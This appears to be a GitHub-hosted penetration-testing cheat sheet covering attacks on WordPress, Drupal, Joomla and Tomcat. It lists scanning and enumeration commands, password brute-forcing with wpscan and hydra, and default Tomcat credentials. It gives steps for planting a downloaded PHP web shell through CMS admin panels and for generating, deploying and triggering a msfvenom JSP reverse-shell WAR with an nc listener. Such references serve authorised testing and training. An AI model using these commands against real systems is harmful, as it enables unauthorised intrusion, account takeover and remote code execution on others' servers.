forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
80
81 lines (62 loc) · 2.58 KB
/
80
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# Automatic scanners
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20
## Wordpress
# Scan
wpscan --rua -e --url <URL>
# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"
## Wordpress panel RCE
# Modifying a php from the theme used (admin credentials needed)
Appearance -> Editor -> 404 Template (at the right)
# Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php
## Drupal
droopescan scan -u <URL>
# Username enumeration
# In /user/register just try to create a username and if the name is already taken it will be notified :
*The name admin is already taken*
# If you request a new password for an existing username :
*Unable to send e-mail. Contact the site administrator if the problem persists.*
# If you request a new password for a non-existent username :
*Sorry, test is not recognized as a user name or an e-mail address.*
# Accessing /user/<number> you can see the number of existing users :
- /user/1 -> Access denied (user exist)
- /user/2 -> Page not found (user doesn't exist)
# Hidden pages enumeration
# Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
# You could find hidden pages (test, dev) which are not referenced by the search engines.
wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ
## Drupal panel RCE
#You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)
Go to Modules -> (Check) PHP Filter -> Save configuration
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview
# Joomla
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v
# Tomcat
# Default credentials to /manager/html
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
# Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u
#
### Tomcat panel RCE
#
## Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
## Upload payload
# Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
# Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shellh&update=true'
## Listener
nc -lvp <PORT>
## Execute payload
curl http://<IP>:8080/shell/